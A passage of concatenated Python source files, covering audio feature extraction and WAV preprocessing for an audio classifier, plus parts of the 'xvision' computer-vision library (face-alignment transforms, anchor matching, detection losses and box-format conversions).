def spectrogram_rolloff(processed_data_path, save_path, n_processes, sr=22050, n_fft=2048, hop_length=512, win_length=None, window='hann', center=True, pad_mode='reflect'):
print("Extracting spectrogram bandwith...")
ensure_dir(save_path)
processed_data_files = sorted([f.path for f in os.scandir(processed_data_path)])
print(processed_data_files)
pool=multiprocessing.Pool(processes=n_processes)
pool.starmap(_spectrogram_rolloff, [[processed_file_path, save_path, sr, n_fft, hop_length, win_length, window, center, pad_mode] for processed_file_path in processed_data_files], chunksize=1)
def _spectrogram_rolloff(processed_file_path, save_path, sr, n_fft, hop_length, win_length, window, center, pad_mode):
processed_data = pkl.load(open(processed_file_path, "rb" ))
extracted_features = processed_data.copy(deep=True)
for index, row in processed_data.iterrows():
data = row["data"]
data_extracted_features= spectral_rolloff(data, sr=sr, n_fft=n_fft, hop_length=hop_length, win_length=win_length, window=window, center=center, pad_mode=pad_mode)
extracted_features.loc[index, "data"] = data_extracted_features
save_filename = "{}_spectrogram_rolloff.pkl".format(os.path.splitext(os.path.basename(processed_file_path))[0].split("_")[0])
save_file_path = os.path.join(save_path, save_filename)
pkl.dump(extracted_features, open(save_file_path, "wb" ) )
print("- Extracting spectrogram rolloff on {} Saved in {}".format(processed_file_path, save_file_path))
def extract_features(processed_data_path, save_path, n_processes, algorithm):
""" Extract features from files at processed_data_path and save the extracted features found at save_path
Args:
processed_data_path (str): Path to the directory containing the processed data
save_path (str): Path to the directory where to save the extracted features
n_processes (int): Number of processes to run in parallel to extract features faster
algorithm (dict): Dictionary with a key "name" (the feature-extraction function to call) and a key "args" (keyword arguments forwarded to that function).
"""
print(processed_data_path)
print(algorithm)
t1 = time.time()
globals()[algorithm["name"]](processed_data_path, save_path, n_processes, **algorithm["args"])
t2 = time.time()
with open("logs/logs.csv", "a") as myfile:
myfile.write("{:%Y-%m-%d %H:%M:%S},extract {} features,{},{},{:.2f}\n".format(datetime.datetime.now(),algorithm["name"],socket.gethostname(),n_processes,t2-t1))
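# extract_features() dispatches with globals()[algorithm["name"]](processed_data_path, save_path, n_processes, **algorithm["args"]),
# so an illustrative "features_extraction" config entry could look like this (values assumed):
#
# features_extraction:
#   processed_data_path: data/preprocessed
#   save_path: data/features/mfcc
#   n_processes: 8
#   algorithm:
#     name: mfcc
#     args:
#       n_mfcc: 20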
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument("-e", "--config_file", default="configs/config.yaml", type=str, help = "Path to the configuration file")
args = parser.parse_args()
features_extraction_cfg = yaml.safe_load(open(args.config_file))["features_extraction"]
print(features_extraction_cfg)
extract_features(**features_extraction_cfg)
```
#### File: AudioClassification/src/preprocessing.py
```python
import os
import pandas as pd
import pickle as pkl
import numpy as np
import argparse
import yaml
import librosa
import scipy
from scipy.io import wavfile
import multiprocessing
import time
import datetime
import socket
def resample_wav_data(wav_data, orig_sr, target_sr):
""" Resample wav_data from sampling rate equals to orig_sr to a new sampling rate equals to target_sr
"""
# resampled_wav_data = librosa.core.resample(y=wav_data.astype(np.float32), orig_sr=orig_sr, target_sr=target_sr)
resampled_wav_data = scipy.signal.resample(wav_data, target_sr)
# print(wav_data, resampled_wav_data, len(resampled_wav_data))
return resampled_wav_data
def pad_wav_data(wav_data, vect_size):
""" Pad wav data
"""
if (len(wav_data) > vect_size):
raise ValueError("")
elif len(wav_data) < vect_size:
padded_wav_data = np.zeros(vect_size)
starting_point = np.random.randint(low=0, high=vect_size-len(wav_data))
padded_wav_data[starting_point:starting_point+len(wav_data)] = wav_data
else:
padded_wav_data = wav_data
return padded_wav_data
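# Worked example of the padding above (illustrative): with vect_size=8 and a signal of length 5,
# a start offset is drawn from [0, 3) and the signal is copied into a zero vector, e.g.
#   wav_data = [1, 2, 3, 4, 5], starting_point = 2  ->  [0, 0, 1, 2, 3, 4, 5, 0]
# Signals longer than vect_size raise ValueError; signals of exactly vect_size are returned unchanged.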
def fft_preprocess_user_data_at_pth(user_data_path, preprocessed_data_path, vect_size):
print(user_data_path)
user_df = pd.DataFrame(columns=['data', "user_id", "record_num", "label"])
wav_user_id = 0
for file in sorted(os.listdir(user_data_path)):
if file.endswith(".wav"):
wav_label, wav_user_id, wav_record_n = os.path.splitext(file)[0].split("_")
wav_sr, wav_data = wavfile.read(os.path.join(user_data_path, file))
resampled_wav_data = resample_wav_data(wav_data, wav_sr, vect_size)
# new_row = {"data": padded_wav_data, "user_id": wav_user_id, "record_num": wav_record_n, "label": wav_label}
new_row = {"data": resampled_wav_data, "user_id": wav_user_id, "record_num": wav_record_n, "label": wav_label}
user_df = user_df.append(new_row, ignore_index=True)
pkl.dump( user_df, open("{}_preprocessed.pkl".format(os.path.join(preprocessed_data_path, str(wav_user_id))), "wb" ) )
def downsampling_preprocess_user_data_at_pth(user_data_path, preprocessed_data_path, target_sr, vect_size):
print(user_data_path)
user_df = pd.DataFrame(columns=['data', "user_id", "record_num", "label"])
wav_user_id = 0
for file in sorted(os.listdir(user_data_path)):
if file.endswith(".wav"):
wav_label, wav_user_id, wav_record_n = os.path.splitext(file)[0].split("_")
wav_sr, wav_data = wavfile.read(os.path.join(user_data_path, file))
y,s = librosa.load(os.path.join(user_data_path, file), target_sr)
padded_wav_data = pad_wav_data(y, vect_size)
new_row = {"data": padded_wav_data, "user_id": wav_user_id, "record_num": wav_record_n, "label": wav_label}
user_df = user_df.append(new_row, ignore_index=True)
pkl.dump(user_df, open("{}_preprocessed.pkl".format(os.path.join(preprocessed_data_path, str(wav_user_id))), "wb" ) )
def preprocess(raw_data_path, preprocessed_data_path, resampling_method, n_process, vect_size, target_sr=8000,):
#Create preprocessed_data_path if the directory does not exist
if not os.path.exists(preprocessed_data_path):
os.makedirs(preprocessed_data_path)
users_data_path = sorted([folder.path for folder in os.scandir(raw_data_path) if folder.is_dir() and any(file.endswith(".wav") for file in os.listdir(folder))])
print(users_data_path)
# pool=multiprocessing.Pool(n_process)
pool=multiprocessing.Pool(1)
if resampling_method == 'fft':
print("Resampling with FFT ...")
pool.starmap(fft_preprocess_user_data_at_pth, [[folder, preprocessed_data_path, vect_size] for folder in users_data_path if os.path.isdir(folder)], chunksize=1)
elif resampling_method == 'downsampling':
print("Resampling by downsampling ...")
pool.starmap(downsampling_preprocess_user_data_at_pth, [[folder, preprocessed_data_path, target_sr, vect_size] for folder in users_data_path if os.path.isdir(folder)], chunksize=1)
else:
raise ValueError(f"method {method} does not exist")
if __name__ == "__main__":
np.random.seed(42)
parser = argparse.ArgumentParser()
parser.add_argument("-p", "--preprocessing_cfg", default="configs/config.yaml", type=str, help = "Path to the configuration file")
args = parser.parse_args()
preprocessing_cfg = yaml.safe_load(open(args.preprocessing_cfg))["preprocessing"]
t1 = time.time()
preprocess(**preprocessing_cfg)
t2 = time.time()
with open("logs/logs.csv", "a") as myfile:
myfile.write("{:%Y-%m-%d %H:%M:%S},data preprocessing,{},{},{:.2f}\n".format(datetime.datetime.now(),socket.gethostname(),preprocessing_cfg['n_process'],t2-t1))
print("Time elapsed for data processing: {} seconds ".format(t2-t1))
#Preprocessing : ~113s using Parallel computing with n_processed = 10 and resampling with scipys
#Preprocessing : ~477.1873028278351 seconds using Parallel computing with n_processed = 10 and resampling with resampy (python module for efficient time-series resampling)
``` |
{
"source": "jimmysue/xvision",
"score": 2
} |
#### File: xvision/candy/mnist.py
```python
from candy.driver import *
import torch.nn as nn
from torchvision.datasets.mnist import MNIST
class LeNet(nn.Module):
def __init__(self):
super().__init__()
self.conv1 = nn.Conv2d(1, 6, kernel_size=5)  # assumed classic LeNet-5 first conv; the original line was left incomplete
```
#### File: projects/fa/transform.py
```python
import cv2
import numpy as np
from numbers import Number
from typing import Dict
from xvision.transforms.umeyama import umeyama
from xvision.transforms.warp import warp_affine
from xvision.transforms.boxes import bbox_affine
from xvision.transforms import matrix2d
from xvision.transforms.shapes import *
from xvision.utils.draw import draw_points
def _to_size(dsize):
if isinstance(dsize, Number):
dsize = (int(dsize), int(dsize))
elif isinstance(dsize, (tuple, list)) and len(dsize) == 2:
width, height = dsize
dsize = (int(width), int(height))
else:
raise ValueError(f'Invalid dsize: {dsize}')
return dsize
class CacheTransform(object):
def __init__(self, dsize, padding, meanshape) -> None:
super().__init__()
self.dsize = _to_size(dsize)
self.padding = padding
self.meanshape = meanshape
meanshape = np.array(meanshape)
unit = to_unit_shape(meanshape)
self.cache_size = tuple(
(np.array(self.dsize) * 2).astype(np.int32).tolist())
self.ref = (unit - 0.5) * (1 - padding) * \
np.array(dsize).min() + np.array(dsize)
def __call__(self, item) -> Dict:
image = cv2.imread(str(item['path']), cv2.IMREAD_COLOR)
shape = item['shape']
matrix = umeyama(shape, self.ref)
image = warp_affine(image, matrix, self.cache_size)
shape = shape_affine(shape, matrix)
return {
'image': image,
'shape': shape
}
def _bbox_to_corner_points(bbox):
x1, y1, x2, y2 = bbox.reshape(-1)
return np.array([
[x1, y1],
[x2, y1],
[x2, y2],
[x1, y2]
])
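# For example (illustrative), a bbox [10, 20, 50, 80] maps to the four corners
# [[10, 20], [50, 20], [50, 80], [10, 80]], i.e. top-left, top-right, bottom-right, bottom-left,
# which is what umeyama() below consumes to estimate the bbox-to-reference similarity transform.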
class Transform(object):
def __init__(self, dsize, padding, meanshape, meanbbox=None, symmetry=None, augments=None) -> None:
super().__init__()
dsize = _to_size(dsize)
meanshape = np.array(meanshape)
unit = to_unit_shape(meanshape)
ref = (unit - 0.5) * (1 - padding) * \
np.array(dsize).min() + np.array(dsize) / 2
if meanbbox:
meanbbox = np.array(meanbbox)
matrix = umeyama(meanshape, ref)
meanbbox = bbox_affine(meanbbox, matrix)
self.meanbbox = meanbbox
self.ref = ref
self.dsize = dsize
self.padding = padding
self.augments = augments
self.symmetry = symmetry
def _augment(self, item, matrix):
r = self.augments['rotate']
s = self.augments['scale']
t = self.augments['translate']
symmetry = self.symmetry
scale = np.exp(np.random.uniform(-np.log(1 + s), np.log(1 + s)))
translate = np.random.uniform(-t, t) * np.array(self.dsize)
angle = np.random.uniform(-r, r)
jitter = matrix2d.translate(
translate) @ matrix2d.center_rotate_scale_cw(np.array(self.dsize)/2, angle, scale)
if self.symmetry and np.random.choice([True, False]):
# mirror
jitter = matrix2d.hflip(self.dsize[0]) @ jitter
shape = item['shape']
shape = shape[..., symmetry, :]
item['shape'] = shape
return jitter @ matrix
def __call__(self, item) -> dict:
image = item['image']
shape = item['shape']
if self.meanbbox is not None:
bbox = item['bbox']
pts = _bbox_to_corner_points(bbox)
ref = _bbox_to_corner_points(self.meanbbox)
matrix = umeyama(pts, ref)
else:
matrix = umeyama(shape, self.ref)
if self.augments:
matrix = self._augment(item, matrix)
image = item['image']
shape = item['shape']
image = warp_affine(image, matrix, self.dsize)
shape = shape_affine(shape, matrix)
return {
'image': image,
'shape': shape.astype(np.float32)
}
if __name__ == '__main__':
import torch
from xvision.datasets.jdlmk import JDLandmark
from xvision.utils.draw import draw_shapes
from config import cfg
from torch.utils.data import DataLoader
from xvision.models.fa import resfa, mbv2
from xvision.datasets.mmap import MMap
root = '/Users/jimmy/Documents/data/FA/IBUG'
landmark = '/Users/jimmy/Documents/data/FA/FLL2/landmark'
picture = '/Users/jimmy/Documents/data/FA/FLL2/picture'
ctrans = CacheTransform(cfg.size, cfg.padding, cfg.meanshape)
MMap.create('cache.npy', JDLandmark.parse(landmark, picture), ctrans, 6)
transform = Transform(cfg.dsize, cfg.padding, cfg.meanshape, cfg.augments)
data = JDLandmark(landmark, picture, transform)
loader = DataLoader(data, batch_size=1)
model = mbv2()
state = torch.load(
'/Users/jimmy/Documents/github/xvision/workspace/fa/step-00016600.pth', map_location='cpu')
model.load_state_dict(state['model'])
model.eval()
for item in data:
image = item['image']
shape = item['shape']
tensor = torch.from_numpy(image).unsqueeze(
0).permute(0, 3, 1, 2).float() / 255
with torch.no_grad():
pred = model(tensor) * 128
pred = pred.detach().numpy().reshape(-1, 2)
draw_points(image, pred, (0, 0, 255))
draw_points(image, shape, (0, 255, 0))
cv2.imshow("v", image)
k = cv2.waitKey()
if k == ord('q'):
exit()
```
#### File: models/fa/resnet.py
```python
from torchvision.models.resnet import resnet18
def resfa(num_points=106):
return resnet18(num_classes=num_points*2)
if __name__ == '__main__':
import torch
model = resfa()
input = torch.rand(1, 3, 128, 128)
model.eval()
shape= model(input)
print(shape.shape)
```
#### File: xvision/models/iqa.py
```python
import torch
import torch.nn as nn
class IQA(nn.Module):
def __init__(self, backbone, head=None) -> None:
super().__init__()
self.backbone = backbone
self.head = head
def forward(self, x):
x = self.backbone(x)
y = self.head(x)
return y
```
#### File: xvision/ops/anchors.py
```python
import torch
import torch.nn as nn
from numbers import Number
from xvision.ops.boxes import bbox2cbox, cbox2bbox, box_iou_pairwise
def _canonical_anchor(anchor):
x, y, r = 0, 0, 0
if isinstance(anchor, Number):
w, h = anchor, anchor
elif isinstance(anchor, (list, tuple)) and len(anchor) == 1:
w = h = anchor[0]
elif isinstance(anchor, (list, tuple)) and len(anchor) == 2:
w, h = anchor
elif isinstance(anchor, (list, tuple)) and len(anchor) == 4:
x, y, w, h = anchor
elif isinstance(anchor, (list, tuple)) and len(anchor) == 5:
x, y, w, h, r = anchor
else:
raise ValueError(f'Invalid anchor setting with value: {anchor}')
return [x, y, w, h]  # note: a rotation component r, if given, is parsed but not used by BBoxAnchors
class BBoxAnchors(nn.Module):
def __init__(self, num_classes, dsize, strides, fsizes, layouts, iou_threshold=0.3, encode_mean=None, encode_std=None):
"""Anchor generation and matching
This object generates anchors for given detection structure, and matches anchors to ground truths to determine
the score of each anchor. And provide interface to encode/decode bboxes and shapes.
Args:
num_classes (int): number of positive classes
dsize (tuple): input size of model
strides (list): list of strides
fsizes (list): list of feature sizes for detection
layouts (list): anchor layout for each feature level
iou_threshold (float, optional): minimal iou to normalize the score of positive anchor. Defaults to 0.3.
encode_mean ([list, tuple], optional): mean vector of encoded box. Defaults to None.
encode_std ([list, tuple], optional): std vector of encoded box. Defaults to None.
"""
super().__init__()
self.dsize = dsize
self.strides = strides
self.fsizes = fsizes
self.layouts = layouts
self.num_classes = num_classes
self.iou_threshold = iou_threshold
if (encode_mean):
encode_mean = torch.tensor(
encode_mean, dtype=torch.float32).reshape(-1)
assert encode_mean.numel() == 4, "encode_mean should be of 4-element"
else:
encode_mean = torch.zeros(4, dtype=torch.float32)
if (encode_std):
encode_std = torch.tensor(
encode_std, dtype=torch.float32).reshape(-1)
assert encode_std.numel() == 4, "encode_std should be of 4-element"
else:
encode_std = torch.ones(4, dtype=torch.float32)
self.register_buffer('encode_mean', encode_mean)
self.register_buffer('encode_std', encode_std)
anchors = self.generate_anchors(strides, fsizes, layouts)
self.register_buffer('anchors', anchors)
@staticmethod
def generate_layer_anchors(stride, fsize, layout, device=None):
device = torch.device('cpu') if device is None else device
layout = [_canonical_anchor(v) for v in layout]
layout = torch.tensor(
layout, dtype=torch.float32, device=device) # [k, 4]
# generate offset grid
fw, fh = fsize
vx = torch.arange(0.5, fw, dtype=torch.float32, device=device) * stride
vy = torch.arange(0.5, fh, dtype=torch.float32, device=device) * stride
vy, vx = torch.meshgrid(vy, vx)
offsets = torch.stack([vx, vy], dim=-1) # [fh, fw, 2]
anchors = layout.repeat(fh, fw, 1, 1) # [fh, fw, k, 4]
anchors[:, :, :, :2] += offsets[:, :, None, :] # [fh, fw, k, 4]
return anchors
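# Worked example (illustrative): stride=8, fsize=(2, 2), layout=[32] yields one 32x32 anchor
# per cell, centred at (4, 4), (12, 4), (4, 12) and (12, 12), i.e. the tensor
#   [[[[ 4,  4, 32, 32]], [[12,  4, 32, 32]]],
#    [[[ 4, 12, 32, 32]], [[12, 12, 32, 32]]]]
# with shape [fh=2, fw=2, k=1, 4].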
@staticmethod
def generate_anchors(strides, fsizes, layouts, device=None):
anchors = []
for stride, fsize, layout in zip(strides, fsizes, layouts):
layer_anchors = BBoxAnchors.generate_layer_anchors(
stride, fsize, layout, device)
layer_anchors = layer_anchors.reshape(-1, 4)
anchors.append(layer_anchors)
anchors = torch.cat(anchors, dim=0)
return anchors
def update(self, fsizes):
device = self.anchors.device
self.anchors = self.generate_anchors(
self.strides, fsizes, self.layouts, device)
def encode_bboxes(self, bboxes):
# bboxes: [*, k, 4]
# self.anchors: [k, 4]
cboxes = bbox2cbox(bboxes)
centers = (cboxes[..., :2] - self.anchors[..., :2]) / \
self.anchors[..., 2:] # [*, k, 2]
sizes = cboxes[..., 2:] / self.anchors[..., 2:]
sizes = torch.log(sizes) # [*, k, 2]
deltas = torch.cat([centers, sizes], dim=-1)
deltas = (deltas - self.encode_mean) / self.encode_std
return deltas
def decode_bboxes(self, deltas):
deltas = (deltas * self.encode_std) + self.encode_mean
sizes = torch.exp(deltas[..., 2:]) * self.anchors[..., 2:]
centers = deltas[..., :2] * \
self.anchors[..., 2:] + self.anchors[..., :2]
cboxes = torch.cat([centers, sizes], dim=-1)
return cbox2bbox(cboxes)
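# Encoding/decoding sketch: for an anchor (ax, ay, aw, ah) and a target box whose centre form
# is (cx, cy, w, h), encode_bboxes produces
#   delta = ([(cx-ax)/aw, (cy-ay)/ah, log(w/aw), log(h/ah)] - encode_mean) / encode_std
# and decode_bboxes inverts this exactly, so decode_bboxes(encode_bboxes(b)) == b up to
# floating-point error.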
def encode_points(self, points):
# points: [*, k, p, 2]
deltas = (points - self.anchors[..., None, :2]
) / self.anchors[..., None, 2:]
deltas = (deltas - self.encode_mean[:2]) / self.encode_std[:2]
return deltas
def decode_points(self, deltas):
# deltas: [*, k, p, 2]
deltas = (deltas * self.encode_std[:2]) + self.encode_mean[:2]
points = deltas * self.anchors[...,
None, 2:] + self.anchors[..., None, :2]
return points
def match(self, labels, bboxes):
# labels: [n]
# bboxes: [n, 4]
# points: [n, p, 2] (p is number of points)
# iou_threshold: threshold to determine positive anchor
banchors = cbox2bbox(self.anchors)
# [k, n] where k is number of anchors
iou = box_iou_pairwise(banchors, bboxes)
# find max iou of anchor to determine gt index
max_iou_of_anchor, box_indice = iou.max(dim=1) # [k]
max_iou_of_bbox, anchor_indice = iou.max(dim=0) # [n]
# make sure each target assigend an anchor
for target_index, anchor_index in enumerate(anchor_indice):
max_iou_of_anchor[anchor_index] = max_iou_of_bbox[target_index]
box_indice[anchor_index] = target_index
# find max iou of each box to determine denominant
denominant = max_iou_of_bbox # [n]
denominant[denominant <
self.iou_threshold] = self.iou_threshold # [n]
denominant = denominant[box_indice] # [k]
max_iou_of_anchor[max_iou_of_anchor < self.iou_threshold / 2] = 0
scores = max_iou_of_anchor / denominant # [k]
labels = labels[box_indice]
ignores = labels <= 0
# set ignore as background score
# TODO: support ignore scores with negative values,
# and sigmoid focal loss should take care of this also
scores[ignores] = 0
# scatter to construct confidence tensor
# scores: [k]
labels[ignores] = 0
conf = scores.new_zeros(scores.size(0), self.num_classes + 1)
# conf: [k, c] # c is the number of classes
# index: [k, 1]
labels = labels.unsqueeze(-1) # [k, 1]
scores = scores.unsqueeze(-1) # [k, 1]
conf.scatter_(dim=1, index=labels, src=scores)
return conf[..., 1:], box_indice
def forward(self, labels, bboxes, *others): # we don't encode
# labels: [B, n]
# bboxes: [B, n, 4]
# points: [B, n, p, 2]
batch_scores = []
batch_bboxes = []
batch_others = [[] for _ in others]
for label, bbox, *other in zip(labels, bboxes, *others):
score, indice = self.match(label, bbox)
batch_scores.append(score)
batch_bboxes.append(bbox[indice])
for i, v in enumerate(other):
batch_others[i].append(v[indice])
scores = torch.stack(batch_scores, 0) # B, k, c
bboxes = torch.stack(batch_bboxes, 0) # B, k, 4
res = (scores, bboxes)
if batch_others:
batch_others = [torch.stack(v) for v in batch_others]
res = (*res, *batch_others)
return res
def split(self, scores):
# [B, k, +]
# return [ [B, h1, w1, +], [B, h2, w2, +], [B, h3, w3, +]] where h*, w* is feature size of each level anchor
# h, w, k, 1
last = 0
nums = []
sizes = []
for i, (w, h) in enumerate(self.fsizes):
k = len(self.layouts[i])
nums.append(
(last, last + w * h * k, k)
)
last = last + w * h * k
sizes.append((w, h))
res = []
for (s, l, k), (w, h) in zip(nums, sizes):
r = scores[:, s:l, ...]
shape = [r.shape[0], h, w] + [k] + list(r.shape[3:])
r = r.reshape(shape)
for i in range(k):
res.append(r[:, :, :, i, ...])
return res
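# Minimal construction sketch (illustrative values, not taken from the original configs):
#   prior = BBoxAnchors(num_classes=1, dsize=(320, 320),
#                       strides=[8, 16, 32],
#                       fsizes=[(40, 40), (20, 20), (10, 10)],
#                       layouts=[[16, 32], [64, 128], [256]])
#   conf, matched_boxes = prior(labels, bboxes)   # per-anchor scores and matched ground-truth boxes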
```
#### File: xvision/ops/euclidean_loss.py
```python
import torch
def euclidean_loss(inputs, targets, reduction='none'):
# inputs: [B, p, 2]
# target: [B, p, 2]
diff = inputs - targets
loss = torch.norm(diff, p=2, dim=-1)
if reduction == 'sum':
loss = loss.sum()
elif reduction == 'mean':
loss = loss.mean()
return loss
if __name__ == '__main__':
a = torch.rand(128, 98, 2)
b = torch.rand(128, 98, 2)
loss = euclidean_loss(a, b, 'none')
print(loss)
print(loss.shape)
```
#### File: xvision/ops/extract_glimpse.py
```python
import torch
import torch.nn as nn
from typing import Union, Tuple
def extract_glimpse(input: torch.Tensor, size: Tuple[int, int], offsets, centered=True, normalized=True, mode='bilinear', padding_mode='zeros'):
    '''Returns a set of windows, called glimpses, extracted at the location
    offsets from the input tensor. If a window only partially overlaps the
    input, the non-overlapping areas are handled as defined by
    :attr:`padding_mode`; the accepted values of :attr:`padding_mode` are
    documented for `torch.grid_sample`.
    The result is a 4-D tensor of shape [N, C, h, w]. The channel and batch
    dimensions are the same as those of the input tensor. The height and width
    of the output windows are specified by the size parameter.
    The arguments normalized and centered control how the windows are built:
    * If the coordinates are normalized but not centered, 0.0 and 1.0 correspond
      to the minimum and maximum of each height and width dimension.
    * If the coordinates are both normalized and centered, they range from
      -1.0 to 1.0. The coordinates (-1.0, -1.0) correspond to the upper-left
      corner, the lower-right corner is located at (1.0, 1.0) and the center
      is at (0, 0).
    * If the coordinates are not normalized they are interpreted as numbers
      of pixels.
    Args:
        input (Tensor): A float32 tensor. A 4-D tensor of shape [N, C, H, W].
        size (tuple): 2-element integer tuple specifying the output glimpses'
            size. The glimpse height must be specified first, followed by the
            glimpse width.
        offsets (Tensor): A float32 tensor. A 2-D tensor of shape
            [batch_size, 2] containing the x, y locations of the center of
            each window.
        centered (bool, optional): Defaults to True. Indicates whether the
            offset coordinates are centered relative to the image, in which
            case the (0, 0) offset is relative to the center of the input
            images. If False, the (0, 0) offset corresponds to the upper-left
            corner of the input images.
        normalized (bool, optional): Defaults to True. Indicates whether the
            offset coordinates are normalized.
        mode (str, optional): Interpolation mode used to calculate output
            values. Defaults to 'bilinear'.
        padding_mode (str, optional): Padding mode for values outside the input.
    Raises:
        ValueError: When normalized is False but centered is True.
    Returns:
        output (Tensor): A Tensor of the same type as input.
    '''
W, H = input.size(-1), input.size(-2)
if normalized and centered:
offsets = (offsets + 1) * offsets.new_tensor([W/2, H/2])
elif normalized:
offsets = offsets * offsets.new_tensor([W, H])
elif centered:
        raise ValueError(
            'Invalid arguments: offsets are centered but not normalized')
h, w = size
xs = torch.arange(0, w, dtype=input.dtype,
device=input.device) - (w - 1) / 2.0
ys = torch.arange(0, h, dtype=input.dtype,
device=input.device) - (h - 1) / 2.0
vy, vx = torch.meshgrid(ys, xs)
grid = torch.stack([vx, vy], dim=-1) # h, w, 2
offsets_grid = offsets[:, None, None, :] + grid[None, ...]
# normalised grid to [-1, 1]
offsets_grid = (
offsets_grid - offsets_grid.new_tensor([W/2, H/2])) / offsets_grid.new_tensor([W/2, H/2])
return torch.nn.functional.grid_sample(
input, offsets_grid, mode=mode, align_corners=False, padding_mode=padding_mode)
def extract_multiple_glimpse(input: torch.Tensor, size: Tuple[int, int], offsets, centered=True, normalized=True, mode='bilinear'):
# offsets: [B, n, 2]
patches = []
for i in range(offsets.size(-2)):
patch = extract_glimpse(
input, size, offsets[:, i, :], centered, normalized, mode)
patches.append(patch)
return torch.stack(patches, dim=1)
```
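A small usage sketch for `extract_glimpse` (the `xvision.ops.extract_glimpse` import path is assumed from the file header above): with the default centered, normalized offsets, (0, 0) crops a window around each image center.
```python
import torch
from xvision.ops.extract_glimpse import extract_glimpse  # path assumed from the header above

images = torch.rand(4, 3, 128, 128)                   # [N, C, H, W]
offsets = torch.zeros(4, 2)                           # centered + normalized: (0, 0) is the image center
patches = extract_glimpse(images, (32, 32), offsets)  # -> [4, 3, 32, 32]
print(patches.shape)
```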
#### File: xvision/ops/multibox.py
```python
import torch.nn.functional as F
from fvcore.nn import sigmoid_focal_loss
from xvision.ops import euclidean_loss
def score_box_loss(target_scores, target_deltas, pred_logits, pred_deltas):
# target_scores: [B, k]
# target_deltas: [B, k, 4]
# pred_scores: [B, k]
# pred_deltas: [B, k, 4]
score_loss = sigmoid_focal_loss(
pred_logits, target_scores, reduction='sum')
maxscore, _ = target_scores.max(-1)
pos_mask = maxscore > 0.5
target_box_deltas_pos = target_deltas[pos_mask].reshape(-1, 2, 2)
pred_box_deltas_pos = pred_deltas[pos_mask].reshape(-1, 2, 2)
box_loss = euclidean_loss(
pred_box_deltas_pos, target_box_deltas_pos, 'sum')
npos = target_box_deltas_pos.shape[0]
return score_loss / npos, box_loss / npos
def score_box_point_loss(target_scores, target_box_deltas, target_point_deltas, pred_logits, pred_box_deltas, pred_point_deltas, point_mask):
# target_scores: [B, k]
# target_box_deltas: [B, k, 4]
# target_point_deltas: [B, k, p, 2]
# point_mask: [B, k]
score_loss = sigmoid_focal_loss(
pred_logits, target_scores, reduction='sum')
maxscore, _ = target_scores.max(-1)
pos_mask = maxscore > 0.5
target_box_deltas_pos = target_box_deltas[pos_mask].reshape(-1, 2, 2)
pred_box_deltas_pos = pred_box_deltas[pos_mask].reshape(-1, 2, 2)
box_loss = euclidean_loss(
pred_box_deltas_pos, target_box_deltas_pos, 'sum')
point_mask = pos_mask & point_mask
target_point = target_point_deltas[point_mask] # -1, p, 2
pred_point = pred_point_deltas[point_mask] # -1, p, 2
point_loss = euclidean_loss(pred_point, target_point, 'sum')
npos = target_box_deltas_pos.shape[0]
npoint = target_point.shape[0]
return score_loss / npos, box_loss / npos, point_loss / npoint
```
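A hedged usage sketch for `score_box_loss` with random tensors (the import path is assumed from the header; shapes follow the comments in the function, here with a single class):
```python
import torch
from xvision.ops.multibox import score_box_loss  # path assumed from the header above

B, k = 2, 100
target_scores = torch.rand(B, k, 1)    # matched anchor confidences in [0, 1]
target_deltas = torch.rand(B, k, 4)    # encoded box targets
pred_logits = torch.randn(B, k, 1)     # raw classification logits
pred_deltas = torch.randn(B, k, 4)     # regressed box deltas
score_loss, box_loss = score_box_loss(target_scores, target_deltas, pred_logits, pred_deltas)
print(score_loss.item(), box_loss.item())
```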
#### File: xvision/transforms/boxes.py
```python
import numpy as np
# naming convention:
# bbox means bounding box encoded with bounding points
# cbox means bounding box encoded with center and size
# abox means affine box encoded as affine matrix
# [ u_x, v_x, cx]
# [ u_y, v_y, cy]
# [ 0, 0, 1]
# rbox means rotated bounding box encoded as [cx, cy, w, h, r]
# where r is the box rotation angle in radians, measured clockwise
# in image coordinates
# rect means box encoded with [left, top, width, height]
# copy from https://github.com/AffineVision/AffineVision/blob/master/affinevision/transforms/boxes.py
def bbox2abox(bboxes, radians=None):
# bboxes: [*, 4]
# radians: box angle in radian
vectors = (bboxes[..., 2:] - bboxes[..., :2]) / 2
centers = (bboxes[..., 2:] + bboxes[..., :2]) / 2
x_vec = vectors[..., 0]
y_vec = vectors[..., 1]
zeros = np.zeros(x_vec.shape)
ones = np.ones(x_vec.shape)
aboxes = np.stack([x_vec, zeros, centers[..., 0], zeros,
y_vec, centers[..., 1], zeros, zeros, ones], axis=-1)
# reshape
shape = (*x_vec.shape, 3, 3)
aboxes = aboxes.reshape(shape)
if radians is not None:
cos = np.cos(radians)
sin = np.sin(radians)
rotate = np.stack([cos, -sin, zeros, sin, cos, zeros,
zeros, zeros, ones], axis=-1).reshape(shape)
aboxes = rotate @ aboxes
return aboxes
def abox2bbox(aboxes):
"""covnert affine boxes to bounding point box
reference: https://www.iquilezles.org/www/articles/ellipses/ellipses.htm
Args:
aboxes ([np.ndarray]): affine boxes shape with [*, 3, 3]
"""
c = aboxes[..., :2, 2]
e = np.linalg.norm(aboxes[..., :2, :2], ord=2, axis=-1)
bboxes = np.concatenate([c - e, c + e], axis=-1)
return bboxes
def bbox2cbox(bboxes):
sizes = bboxes[..., 2:] - bboxes[..., :2]
centers = (bboxes[..., :2] + bboxes[..., 2:]) / 2
cboxes = np.concatenate([centers, sizes], axis=-1)
return cboxes
def cbox2bbox(cboxes):
    halfs = cboxes[..., 2:] / 2
    lt = cboxes[..., :2] - halfs
    rb = cboxes[..., :2] + halfs
    bboxes = np.concatenate([lt, rb], axis=-1)
    return bboxes
def cbox2abox(cboxes):
bboxes = cbox2bbox(cboxes)
return bbox2abox(bboxes)
def abox2cbox(aboxes):
bboxes = abox2bbox(aboxes)
return bbox2cbox(bboxes)
def rbox2abox(rboxes):
radians = rboxes[:, -1]
cboxes = rboxes[:, :4]
bboxes = cbox2bbox(cboxes)
aboxes = bbox2abox(bboxes, radians)
return aboxes
def abox2rbox(aboxes):
# aboxes [*, 3, 3]
radians = np.arctan2(aboxes[..., 1, 0], aboxes[..., 0, 1])
sizes = np.linalg.norm(aboxes[..., :2, :2], ord=2, axis=-2)
centers = aboxes[..., :2, 2]
rboxes = np.concatenate([centers, sizes, radians[..., None]], axis=-1)
return rboxes
def bbox_affine(bboxes, matrix):
aboxes = bbox2abox(bboxes)
aboxes = matrix @ aboxes
return abox2bbox(aboxes)
def bbox2rect(bboxes):
# [*, 4]
sizes = bboxes[..., 2:] - bboxes[..., :2]
